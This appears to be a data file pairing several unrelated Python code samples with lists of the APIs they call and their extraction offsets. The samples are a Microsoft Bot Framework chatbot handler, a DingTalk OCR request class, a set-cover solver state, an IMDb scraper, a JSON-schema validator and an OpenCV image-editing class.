def get_client_configuration(self):
return MicrosoftConfiguration()
def get_microsoft_app_id(self):
return self.license_keys.get_key("MICROSOFT_APP_ID")
def get_microsoft_app_password(self):
return self.license_keys.get_key("MICROSOFT_APP_PASSWORD")
def get_new_user_message(self):
if self.configuration.client_configuration.new_user_srai is not None:
pass
return self.configuration.client_configuration.new_user_text
def ask_question(self, question):
reply = ""
try:
client_context = self.create_client_context("microsoft")
self._questions += 1
reply = client_context.bot.ask_question(client_context, question, responselogger=self)
except Exception as e:
YLogger.exception(client_context, "Error getting reply from bot", e)
return reply
MICROSOFT_CLIENT = MicrosoftBotClient()
class BotRequestHandler(http.server.BaseHTTPRequestHandler):
@staticmethod
def __create_reply_activity(request_activity, text):
return Activity(
type=ActivityTypes.message,
channel_id=request_activity.channel_id,
conversation=request_activity.conversation,
recipient=request_activity.from_property,
from_property=request_activity.recipient,
text=text,
service_url=request_activity.service_url)
def __handle_conversation_update_activity(self, activity):
self.send_response(202)
self.end_headers()
if len(activity.members_added):
if activity.members_added[0].id != activity.recipient.id:
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
response = MICROSOFT_CLIENT.get_new_user_message()
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector = ConnectorClient(credentials, base_url=reply.service_url)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_message_activity(self, activity):
self.send_response(200)
self.end_headers()
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
connector = ConnectorClient(credentials, base_url=activity.service_url)
response = MICROSOFT_CLIENT.ask_question(activity.text)
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_authentication(self, activity):
credential_provider = SimpleCredentialProvider(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(JwtTokenValidation.authenticate_request(activity,
self.headers.get("Authorization"),
credential_provider))
return True
except Exception as ex:
self.send_response(401, ex)
self.end_headers()
return False
finally:
loop.close()
def __unhandled_activity(self):
self.send_response(404)
self.end_headers()
def do_POST(self):
body = self.rfile.read(int(self.headers['Content-Length']))
data = json.loads(str(body, 'utf-8'))
activity = Activity.deserialize(data)
if not self.__handle_authentication(activity):
return
if activity.type == ActivityTypes.conversation_update.value:
self.__handle_conversation_update_activity(activity)
elif activity.type == ActivityTypes.message.value:
self.__handle_message_activity(activity)
else:
self.__unhandled_activity()
if __name__ == '__main__':
print("Initiating Microsoft Client...")
SERVER = None
try:
host = MICROSOFT_CLIENT.configuration.client_configuration.host
port = MICROSOFT_CLIENT.configuration.client_configuration.port
SERVER = http.server.HTTPServer((host, port), BotRequestHandler)
print('Started http server')
SERVER.serve_forever()
except KeyboardInterrupt:
print('Ctrl received, shutting down server')
if SERVER is not None:
SERVER.socket.close()
|
[
"botbuilder.schema.Activity.deserialize",
"botframework.connector.ConnectorClient",
"programy.utils.logging.ylogger.YLogger.debug",
"programy.utils.logging.ylogger.YLogger.exception",
"programy.clients.restful.asyncio.microsoft.config.MicrosoftConfiguration",
"programy.clients.restful.flask.client.FlaskRestBotClient.__init__",
"botbuilder.schema.Activity",
"asyncio.new_event_loop"
] |
[((1667, 1730), 'programy.clients.restful.flask.client.FlaskRestBotClient.__init__', 'FlaskRestBotClient.__init__', (['self', '"""microsoft"""', 'argument_parser'], {}), "(self, 'microsoft', argument_parser)\n", (1694, 1730), False, 'from programy.clients.restful.flask.client import FlaskRestBotClient\n'), ((1740, 1794), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', '"""Microsoft Client is running...."""'], {}), "(self, 'Microsoft Client is running....')\n", (1753, 1794), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((1893, 1917), 'programy.clients.restful.asyncio.microsoft.config.MicrosoftConfiguration', 'MicrosoftConfiguration', ([], {}), '()\n', (1915, 1917), False, 'from programy.clients.restful.asyncio.microsoft.config import MicrosoftConfiguration\n'), ((2932, 3202), 'botbuilder.schema.Activity', 'Activity', ([], {'type': 'ActivityTypes.message', 'channel_id': 'request_activity.channel_id', 'conversation': 'request_activity.conversation', 'recipient': 'request_activity.from_property', 'from_property': 'request_activity.recipient', 'text': 'text', 'service_url': 'request_activity.service_url'}), '(type=ActivityTypes.message, channel_id=request_activity.channel_id,\n conversation=request_activity.conversation, recipient=request_activity.\n from_property, from_property=request_activity.recipient, text=text,\n service_url=request_activity.service_url)\n', (2940, 3202), False, 'from botbuilder.schema import Activity, ActivityTypes\n'), ((4346, 4405), 'botframework.connector.ConnectorClient', 'ConnectorClient', (['credentials'], {'base_url': 'activity.service_url'}), '(credentials, base_url=activity.service_url)\n', (4361, 4405), False, 'from botframework.connector import ConnectorClient\n'), ((4896, 4920), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (4918, 4920), False, 'import asyncio\n'), ((5676, 5702), 'botbuilder.schema.Activity.deserialize', 'Activity.deserialize', (['data'], {}), '(data)\n', (5696, 5702), False, 'from botbuilder.schema import Activity, ActivityTypes\n'), ((2644, 2712), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['client_context', '"""Error getting reply from bot"""', 'e'], {}), "(client_context, 'Error getting reply from bot', e)\n", (2661, 2712), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3887, 3943), 'botframework.connector.ConnectorClient', 'ConnectorClient', (['credentials'], {'base_url': 'reply.service_url'}), '(credentials, base_url=reply.service_url)\n', (3902, 3943), False, 'from botframework.connector import ConnectorClient\n')]
|
'''
Created by auto_sdk on 2021.01.26
'''
from dingtalk.api.base import RestApi
class OapiFinanceIdCardOcrRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.back_picture_url = None
self.front_picture_url = None
self.id_card_no = None
self.request_id = None
self.user_mobile = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.finance.IdCard.ocr'
|
[
"dingtalk.api.base.RestApi.__init__"
] |
[((156, 183), 'dingtalk.api.base.RestApi.__init__', 'RestApi.__init__', (['self', 'url'], {}), '(self, url)\n', (172, 183), False, 'from dingtalk.api.base import RestApi\n')]
|
# program r4_01.py
# Check whether the required external libraries are installed
# Import additional helper functions
from sys import exit
from r4_functions import *
load_module_ok = True
try:
import numpy as np
ok_module_info("numpy")
except:
error_module_info("numpy")
load_module_ok = False
try:
import matplotlib
ok_module_info("matplotlib")
except:
    error_module_info("matplotlib")
load_module_ok = False
try:
from astropy.time import Time
ok_module_info("astropy")
except:
error_module_info("astropy")
load_module_ok = False
try:
from astroquery.jplhorizons import Horizons
ok_module_info("astroquery")
except:
error_module_info("astroquery")
load_module_ok = False
if not load_module_ok:
print("Niestety, wystąpiły błędy.")
print("Nie mogę dalej działać.")
exit(0)
# Now all required modules are installed
print("Super! Możemy działać.")
|
[
"sys.exit"
] |
[((853, 860), 'sys.exit', 'exit', (['(0)'], {}), '(0)\n', (857, 860), False, 'from sys import exit\n')]
|
#!/usr/bin/env python
# encoding: utf-8
from collections import defaultdict
from cp_estimator import Estimator
class State(object):
def __init__(self, estimator, set2items, item2sets,
parent=None, picked_set=None, decision=None):
# Don't use this constructor directly. Use .from_task() instead
self.estimator = estimator # just copy the pointer from the parent for fast access
self.set2items = set2items # {set_index: set(indexes of not covered items)}
self.item2sets = item2sets # {item_index: set(indexes of sets that can cover the item and have no decision yet)}
self.parent = parent # parent state object
self.picked_set = picked_set # picked set index
self.decision = decision # whether we build picked_set or not
self.is_feasible = True
if decision:
self.chosen_sets = {picked_set}
else:
self.chosen_sets = set()
self.propagate_constaints()
if self.is_feasible:
self.recalc_cost()
def recalc_cost(self):
additional = self.estimator.cost_of_chosen_list(self.chosen_sets)
if self.parent is None:
self.current_cost = additional
else:
self.current_cost = self.parent.current_cost + additional
@classmethod
def from_task(cls, task):
# Make initial state
estimator = Estimator(task)
set2items = {s.index: set(s.items) for s in task.sets}
item2sets = defaultdict(set)
for set_idx, set_items in set2items.iteritems():
for item_idx in set_items:
item2sets[item_idx].add(set_idx)
return cls(estimator, set2items, dict(item2sets),
parent=None, picked_set=None, decision=False)
def __repr__(self):
return 'State(picked={},chosen={})'.format(self.picked_set, self.decision)
# Search
def next_child(self):
picked_set = self.estimator.pick_a_set(self)
return self.create_child(picked_set, decision=True)
def create_child(self, picked_set, decision):
set2items = {s: i.copy() for s, i in self.set2items.iteritems()} # Copy for mutating in child state
item2sets = {i: s.copy() for i, s in self.item2sets.iteritems()} # TODO: Copy is expensive. Can we avoid it?
return self.__class__(self.estimator, set2items, item2sets,
parent=self, picked_set=picked_set, decision=decision)
def negate(self):
# Generate sibling state, where picked_set is not chosen
# If we already there, rollback to the parent state and repeat on it
state = self
while state:
if state.decision:
return state.parent.create_child(state.picked_set, decision=False)
else:
state = state.parent
return None # if we have eventually got stat = None, it means that we are reached initial state
# Constraints propagation
def propagate_constaints(self):
if self.decision:
self.propagate_on_choice()
else:
self.propagate_on_toss()
def propagate_on_choice(self):
self.on_sets_chosen(self.chosen_sets) # there is only one set in chosen_sets (picked_set)
def propagate_on_toss(self):
if self.picked_set is not None: # "if we are not at the init state"
orphaned_items = self.set2items.pop(self.picked_set)
for item_idx in orphaned_items:
sets = self.item2sets[item_idx]
sets.remove(self.picked_set)
if not sets:
self.is_feasible = False
# We can't cover the item.
# No matter, what else. State doesn't lead to any feasible solutions
return
# before = len(self.set2items)
# self.remove_expensive_subsets(orphaned_items, # Too expensive calculations :o(
# self.estimator.cost_of_chosen(self.picked_set))
# after = len(self.set2items)
# if after != before:
# self.estimator.metrics['cut_exp'] += 1
# else:
# self.estimator.metrics['not_cut_exp'] += 1
# if not self.is_feasible:
# self.estimator.metrics['rollback_exp'] += 1
# return
# Immediately set 1 for every set that can't be replaced with another set
required_sets = self.detect_required_sets()
self.chosen_sets.update(required_sets)
self.on_sets_chosen(required_sets)
def detect_required_sets(self):
required_sets = set()
for item, sets in self.item2sets.iteritems():
if len(sets) == 1: # only one set can cover this item
required_sets.update(sets)
return required_sets
def on_items_covered(self, to_remove):
overvalued_sets = set()
for item in to_remove:
overvalued_sets.update(self.item2sets.pop(item))
for s in overvalued_sets & set(self.set2items):
items = self.set2items[s]
items -= to_remove
if not items:
del self.set2items[s]
#before = len(self.set2items)
#self.remove_redundant_sets(overvalued_sets & set(self.set2items)) # expensive operation. Work good only on the large datasets
#after = len(self.set2items)
#if after < before:
# print 'profit {}->{}'.format(before, after)
def remove_expensive_subsets(self, items, cost_limit):
# We can cover items with the cost=cost_limit
# But we don't do that. So, we don't want to cover the items with the more expensive sets
costs = self.estimator.set_costs
iter_items = iter(items)
candidates = list(self.item2sets[next(iter_items)])
for cand_idx in candidates:
if costs[cand_idx] >= cost_limit:
cand_items = self.set2items[cand_idx]
if len(cand_items) <= len(items) and cand_items <= items:
del self.set2items[cand_idx]
for item_idx in cand_items:
sets = self.item2sets[item_idx]
sets.remove(cand_idx)
if not sets:
self.is_feasible = False
return # We cant cover the item
def on_sets_chosen(self, sets):
covered_items = set()
for s in sets:
covered_items.update(self.set2items.pop(s))
self.on_items_covered(covered_items)
# Getting info
def is_all_covered(self):
return not self.item2sets
def get_optimistic_cost(self):
return self.estimator.get_optimistic(self)
if __name__ == '__main__':
from reader import read_input
from time import time as now
state = State.from_task(read_input('sc_15_0'))
# st = now()
# state.remove_redundant_sets()
# print now() - st
|
[
"collections.defaultdict",
"cp_estimator.Estimator",
"reader.read_input"
] |
[((1415, 1430), 'cp_estimator.Estimator', 'Estimator', (['task'], {}), '(task)\n', (1424, 1430), False, 'from cp_estimator import Estimator\n'), ((1515, 1531), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (1526, 1531), False, 'from collections import defaultdict\n'), ((6950, 6971), 'reader.read_input', 'read_input', (['"""sc_15_0"""'], {}), "('sc_15_0')\n", (6960, 6971), False, 'from reader import read_input\n')]
|
"""Test suite for Beta Diversity display module."""
from app.display_modules.beta_div import BetaDiversityDisplayModule
from app.display_modules.beta_div.models import BetaDiversityResult
from app.display_modules.beta_div import MODULE_NAME
from app.display_modules.display_module_base_test import BaseDisplayModuleTest
from app.tool_results.beta_diversity.models import BetaDiversityToolResult
from app.tool_results.beta_diversity.tests.factory import create_ranks
from tests.utils import add_sample_group
from .factory import BetaDiversityFactory
class TestBetaDivModule(BaseDisplayModuleTest):
"""Test suite for Beta Diversity diplay module."""
def test_add_beta_div(self):
"""Ensure Beta Diversity model is created correctly."""
ranks = create_ranks()
beta_div_result = BetaDiversityResult(data=ranks)
self.generic_adder_test(beta_div_result, MODULE_NAME)
def test_get_beta_div(self):
"""Ensure getting a single Beta Diversity behaves correctly."""
beta_div_result = BetaDiversityFactory()
self.generic_getter_test(beta_div_result, MODULE_NAME,
verify_fields=('data',))
def test_run_beta_div_sample_group(self): # pylint: disable=invalid-name
"""Ensure Beta Diversity run_sample_group produces correct results."""
def create_sample_group():
"""Create unique sample for index i."""
sample_group = add_sample_group(name='SampleGroup01')
ranks = create_ranks()
BetaDiversityToolResult(sample_group_uuid=sample_group.id, data=ranks).save()
return sample_group
self.generic_run_group_test(None,
BetaDiversityDisplayModule,
group_builder=create_sample_group)
|
[
"app.display_modules.beta_div.models.BetaDiversityResult",
"tests.utils.add_sample_group",
"app.tool_results.beta_diversity.tests.factory.create_ranks",
"app.tool_results.beta_diversity.models.BetaDiversityToolResult"
] |
[((772, 786), 'app.tool_results.beta_diversity.tests.factory.create_ranks', 'create_ranks', ([], {}), '()\n', (784, 786), False, 'from app.tool_results.beta_diversity.tests.factory import create_ranks\n'), ((813, 844), 'app.display_modules.beta_div.models.BetaDiversityResult', 'BetaDiversityResult', ([], {'data': 'ranks'}), '(data=ranks)\n', (832, 844), False, 'from app.display_modules.beta_div.models import BetaDiversityResult\n'), ((1456, 1494), 'tests.utils.add_sample_group', 'add_sample_group', ([], {'name': '"""SampleGroup01"""'}), "(name='SampleGroup01')\n", (1472, 1494), False, 'from tests.utils import add_sample_group\n'), ((1515, 1529), 'app.tool_results.beta_diversity.tests.factory.create_ranks', 'create_ranks', ([], {}), '()\n', (1527, 1529), False, 'from app.tool_results.beta_diversity.tests.factory import create_ranks\n'), ((1542, 1612), 'app.tool_results.beta_diversity.models.BetaDiversityToolResult', 'BetaDiversityToolResult', ([], {'sample_group_uuid': 'sample_group.id', 'data': 'ranks'}), '(sample_group_uuid=sample_group.id, data=ranks)\n', (1565, 1612), False, 'from app.tool_results.beta_diversity.models import BetaDiversityToolResult\n')]
|
import requests,pprint,json
from bs4 import BeautifulSoup
url=requests.get("https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in")
soup=BeautifulSoup(url.text,"lxml")
def scrape_top_list():
tbody= soup.find("tbody",class_="lister-list")
all_movies=[]
for tr in tbody.find_all("tr"):
dic={}
dic["ratting"]=float(tr.find("td",class_="ratingColumn imdbRating").text)
for td in tr.find_all("td",class_="titleColumn"):
nam=""
dic["Url"]="https://www.imdb.com/"+td.find("a")["href"][:16]
nyp=[]
for letter in td.text:
nam+=letter
if letter=="\n":
nyp.append(nam.strip())
nam=""
dic["position"]=int(nyp[1][:-1])
dic["nam"] = str(nyp[2])
dic["year"]=int(nyp[3][1:-1])
all_movies.append(dic)
with open("movies.json","w") as file:
data=json.dumps(all_movies)
file.write(data)
return all_movies
# pprint.pprint(scrape_top_list())
|
[
"bs4.BeautifulSoup",
"requests.get",
"json.dumps"
] |
[((62, 152), 'requests.get', 'requests.get', (['"""https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in"""'], {}), "(\n 'https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in')\n", (74, 152), False, 'import requests, pprint, json\n'), ((153, 184), 'bs4.BeautifulSoup', 'BeautifulSoup', (['url.text', '"""lxml"""'], {}), "(url.text, 'lxml')\n", (166, 184), False, 'from bs4 import BeautifulSoup\n'), ((816, 838), 'json.dumps', 'json.dumps', (['all_movies'], {}), '(all_movies)\n', (826, 838), False, 'import requests, pprint, json\n')]
|
# -*- coding: utf-8 -*-
import jsonschema
import sys
def clean_doc(doc):
"""
Clean given JSON document from keys where its value is None
:param doc: Pure, dirty JSON
:return: Cleaned JSON document
"""
for key, value in list(doc.items()):
if value is None:
del doc[key]
elif isinstance(value, dict):
clean_doc(value)
return doc
def is_valid(doc, schema):
"""
Checks if given doc is valid against given schema
:param doc: to be validated JSON
:param schema: base JSON
:return: a boolean result and error
"""
try:
jsonschema.validate(doc, schema)
sys.stdout.write("OK\n")
return True, None
except jsonschema.exceptions.ValidationError as val_err:
sys.stderr.write("FAIL\n")
return False, val_err
|
[
"jsonschema.validate",
"sys.stdout.write",
"sys.stderr.write"
] |
[((620, 652), 'jsonschema.validate', 'jsonschema.validate', (['doc', 'schema'], {}), '(doc, schema)\n', (639, 652), False, 'import jsonschema\n'), ((661, 685), 'sys.stdout.write', 'sys.stdout.write', (['"""OK\n"""'], {}), "('OK\\n')\n", (677, 685), False, 'import sys\n'), ((782, 808), 'sys.stderr.write', 'sys.stderr.write', (['"""FAIL\n"""'], {}), "('FAIL\\n')\n", (798, 808), False, 'import sys\n')]
|
import os
import json
cwd=os.getcwd()
weighted_graph_dict={}
stop_dict = {}
off_stop_dict={}
with open(cwd+'/WeightedGraph','r')as f:
line = True
while line:
line = f.readline()
if line:
data = json.loads(line)
weighted_graph_dict = data
exception_dict={}
with open(cwd+'/RouteData','r')as f:
line=True
while line:
line=f.readline()
print(line)
if line:
data=json.loads(line)
print(data)
with open(cwd+'/TrainLog','r')as f:
line=True
while line:
line=f.readline()
if line:
data=json.loads(line)
if not data['id'] in off_stop_dict:
off_stop_dict.update({data['id']:data['name']})
if not data['name'] in off_stop_dict:
train=data['train']
off_stop_dict.update({data['name']:{}})
elif len(data['train'])>0:
train=data['train']
if not train['id'] in off_stop_dict[data['name']]:
off_stop_dict[data['name']].update({train['id']:{}})
else:
stop=off_stop_dict[data['name']]
loc_train=stop[train['id']]
loc_train.update({data['time']:{'stop_list':train['stop_list'],'stop_index':train['stop_index']}})
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
# with open(cwd + '/External/test', 'w')as f1:
# json.dump(off_stop_dict,f1)
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
print(off_stop_dict['Bank'])
for stuff in off_stop_dict:
if off_stop_dict[stuff]=='Waterloo':
print(stuff)
"""
structure of data produced:
{
id:{
name: "full-name"
trips:{
money: "money-left"
trip_time: "hours-min-sec"
trip_cost: "cost"
trip_taken: "loctionA-locationB"
transits: [station1,station2,station3]
arrival_time: "time"
trains_taken: {
train Id:
{
Time: {
stop_list:[1,2,3]
stop_index: index
}
}
}
}
}
"""
"""
structure of dictionary:
{data
stopId:"stationName",
stopId2:"stationName2",
station_name: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
station_name2: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
}
"""
|
[
"os.getcwd",
"json.loads"
] |
[((26, 37), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (35, 37), False, 'import os\n'), ((231, 247), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (241, 247), False, 'import json\n'), ((453, 469), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (463, 469), False, 'import json\n'), ((616, 632), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (626, 632), False, 'import json\n')]
|
# Created by Packetsss
# Personal use is allowed
# Commercial use is prohibited
import numpy as np
import cv2
from scipy import ndimage
import math
from copy import deepcopy
class Images:
def __init__(self, img):
self.img = cv2.imread(img, 1)
if self.img.shape[0] / self.img.shape[1] < 0.76:
self.img_width = 1100
self.img_height = int(self.img_width * self.img.shape[0] / self.img.shape[1])
else:
self.img_height = 700
self.img_width = int(self.img_height * self.img.shape[1] / self.img.shape[0])
self.img = cv2.resize(self.img, (self.img_width, self.img_height))
self.img_copy = deepcopy(self.img)
self.grand_img_copy = deepcopy(self.img)
self.img_name = img.split('\\')[-1].split(".")[0]
self.img_format = img.split('\\')[-1].split(".")[1]
self.left, self.right, self.top, self.bottom = None, None, None, None
# self.bypass_censorship()
def auto_contrast(self):
clip_hist_percent = 20
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
hist = cv2.calcHist([gray], [0], None, [256], [0, 256])
hist_size = len(hist)
accumulator = [float(hist[0])]
for index in range(1, hist_size):
accumulator.append(accumulator[index - 1] + float(hist[index]))
maximum = accumulator[-1]
clip_hist_percent *= (maximum / 100.0)
clip_hist_percent /= 2.0
minimum_gray = 0
while accumulator[minimum_gray] < clip_hist_percent:
minimum_gray += 1
maximum_gray = hist_size - 1
while accumulator[maximum_gray] >= (maximum - clip_hist_percent):
maximum_gray -= 1
alpha = 255 / (maximum_gray - minimum_gray)
beta = -minimum_gray * alpha
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def auto_sharpen(self):
self.img = cv2.detailEnhance(self.img, sigma_s=10, sigma_r=0.3)
def auto_cartoon(self, style=0):
edges1 = cv2.bitwise_not(cv2.Canny(self.img, 100, 200))
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
gray = cv2.medianBlur(gray, 5)
edges2 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 7, 7)
dst = cv2.edgePreservingFilter(self.img, flags=2, sigma_s=64, sigma_r=0.25)
if not style:
# less blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges1)
else:
# more blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges2)
def auto_invert(self):
self.img = cv2.bitwise_not(self.img)
def change_b_c(self, alpha=1, beta=0):
# contrast from 0 to 3, brightness from -100 to 100
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def change_saturation(self, value):
# -300 to 300
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
(h, s, v) = cv2.split(img_hsv)
s += value
s = np.clip(s, 0, 255)
img_hsv = cv2.merge([h, s, v])
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def remove_color(self, color):
h = color.lstrip('#')
color = np.array([int(h[i:i + 2], 16) for i in (0, 2, 4)])
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
low = np.array([color[0] - 15, 0, 20])
high = np.array([color[0] + 15, 255, 255])
mask = cv2.inRange(img_hsv, low, high)
img_hsv[mask > 0] = (0, 0, 255)
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def crop_img(self, left, right, top, bottom):
self.img = self.img[left:right, top:bottom]
def rotate_img(self, angle, crop=False, flip=[False, False]):
self.reset(flip)
if not crop:
self.img = cv2.resize(self.img, (0, 0), fx=0.5, fy=0.5)
w, h = self.img.shape[1], self.img.shape[0]
else:
w, h = self.img_width, self.img_height
self.img = ndimage.rotate(self.img, angle)
angle = math.radians(angle)
quadrant = int(math.floor(angle / (math.pi / 2))) & 3
sign_alpha = angle if ((quadrant & 1) == 0) else math.pi - angle
alpha = (sign_alpha % math.pi + math.pi) % math.pi
bb_w = w * math.cos(alpha) + h * math.sin(alpha)
bb_h = w * math.sin(alpha) + h * math.cos(alpha)
gamma = math.atan2(bb_w, bb_w) if (w < h) else math.atan2(bb_w, bb_w)
delta = math.pi - alpha - gamma
length = h if (w < h) else w
d = length * math.cos(alpha)
a = d * math.sin(alpha) / math.sin(delta)
y = a * math.cos(gamma)
x = y * math.tan(gamma)
wr, hr = bb_w - 2 * x, bb_h - 2 * y
midpoint = (np.array(self.img.shape[:-1]) // 2)[::-1]
half_w, half_h = wr // 2, hr // 2
self.left, self.right, self.top, self.bottom = int(midpoint[0] - half_w), int(midpoint[0] + half_w), \
int(midpoint[1] - half_h), int(midpoint[1] + half_h)
def detect_face(self):
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_alt2.xml')
# eye_cascade = cv2.CascadeClassifier('data/haarcascade_eye.xml')
gray_scale_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
face_coord = face_cascade.detectMultiScale(gray_scale_img)
return face_coord
def bypass_censorship(self):
width = self.img.shape[1]
height = self.img.shape[0]
smaller_img = cv2.resize(self.img, (width // 2, height // 2))
image = np.zeros(self.img.shape, np.uint8)
try:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2:, :width // 2] = smaller_img
image[height // 2:, width // 2:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2:] = smaller_img
except:
try:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2 + 1:, :width // 2] = smaller_img
image[height // 2 + 1:, width // 2:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2:] = smaller_img
except:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2:, :width // 2] = smaller_img
image[height // 2:, width // 2 + 1:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2 + 1:] = smaller_img
self.img = image
def save_img(self, file):
cv2.imwrite(file, self.img)
def reset(self, flip=None):
if flip is None:
flip = [False, False]
self.img = deepcopy(self.img_copy)
if flip[0]:
self.img = cv2.flip(self.img, 0)
if flip[1]:
self.img = cv2.flip(self.img, 1)
def grand_reset(self):
self.img = deepcopy(self.grand_img_copy)
self.img_copy = deepcopy(self.grand_img_copy)
def main():
path = "ppl.jpg"
img = Images(path)
img_name = path.split('\\')[-1].split(".")[0]
cv2.imshow(img_name, img.img)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
[
"cv2.bitwise_and",
"cv2.medianBlur",
"math.atan2",
"cv2.adaptiveThreshold",
"numpy.clip",
"cv2.edgePreservingFilter",
"cv2.imshow",
"cv2.inRange",
"cv2.cvtColor",
"math.radians",
"cv2.imwrite",
"cv2.detailEnhance",
"cv2.split",
"cv2.convertScaleAbs",
"math.cos",
"cv2.destroyAllWindows",
"cv2.resize",
"copy.deepcopy",
"cv2.Canny",
"cv2.bitwise_not",
"cv2.waitKey",
"cv2.calcHist",
"math.sin",
"cv2.flip",
"cv2.merge",
"cv2.rotate",
"math.tan",
"numpy.zeros",
"math.floor",
"cv2.imread",
"numpy.array",
"cv2.CascadeClassifier",
"scipy.ndimage.rotate"
] |
[((7505, 7534), 'cv2.imshow', 'cv2.imshow', (['img_name', 'img.img'], {}), '(img_name, img.img)\n', (7515, 7534), False, 'import cv2\n'), ((7540, 7553), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (7551, 7553), False, 'import cv2\n'), ((7559, 7582), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (7580, 7582), False, 'import cv2\n'), ((251, 269), 'cv2.imread', 'cv2.imread', (['img', '(1)'], {}), '(img, 1)\n', (261, 269), False, 'import cv2\n'), ((617, 672), 'cv2.resize', 'cv2.resize', (['self.img', '(self.img_width, self.img_height)'], {}), '(self.img, (self.img_width, self.img_height))\n', (627, 672), False, 'import cv2\n'), ((698, 716), 'copy.deepcopy', 'deepcopy', (['self.img'], {}), '(self.img)\n', (706, 716), False, 'from copy import deepcopy\n'), ((748, 766), 'copy.deepcopy', 'deepcopy', (['self.img'], {}), '(self.img)\n', (756, 766), False, 'from copy import deepcopy\n'), ((1088, 1130), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2GRAY'], {}), '(self.img, cv2.COLOR_BGR2GRAY)\n', (1100, 1130), False, 'import cv2\n'), ((1149, 1197), 'cv2.calcHist', 'cv2.calcHist', (['[gray]', '[0]', 'None', '[256]', '[0, 256]'], {}), '([gray], [0], None, [256], [0, 256])\n', (1161, 1197), False, 'import cv2\n'), ((1882, 1935), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['self.img'], {'alpha': 'alpha', 'beta': 'beta'}), '(self.img, alpha=alpha, beta=beta)\n', (1901, 1935), False, 'import cv2\n'), ((1987, 2039), 'cv2.detailEnhance', 'cv2.detailEnhance', (['self.img'], {'sigma_s': '(10)', 'sigma_r': '(0.3)'}), '(self.img, sigma_s=10, sigma_r=0.3)\n', (2004, 2039), False, 'import cv2\n'), ((2161, 2203), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2GRAY'], {}), '(self.img, cv2.COLOR_BGR2GRAY)\n', (2173, 2203), False, 'import cv2\n'), ((2220, 2243), 'cv2.medianBlur', 'cv2.medianBlur', (['gray', '(5)'], {}), '(gray, 5)\n', (2234, 2243), False, 'import cv2\n'), ((2262, 2352), 'cv2.adaptiveThreshold', 'cv2.adaptiveThreshold', (['gray', '(255)', 'cv2.ADAPTIVE_THRESH_MEAN_C', 'cv2.THRESH_BINARY', '(7)', '(7)'], {}), '(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.\n THRESH_BINARY, 7, 7)\n', (2283, 2352), False, 'import cv2\n'), ((2363, 2432), 'cv2.edgePreservingFilter', 'cv2.edgePreservingFilter', (['self.img'], {'flags': '(2)', 'sigma_s': '(64)', 'sigma_r': '(0.25)'}), '(self.img, flags=2, sigma_s=64, sigma_r=0.25)\n', (2387, 2432), False, 'import cv2\n'), ((2703, 2728), 'cv2.bitwise_not', 'cv2.bitwise_not', (['self.img'], {}), '(self.img)\n', (2718, 2728), False, 'import 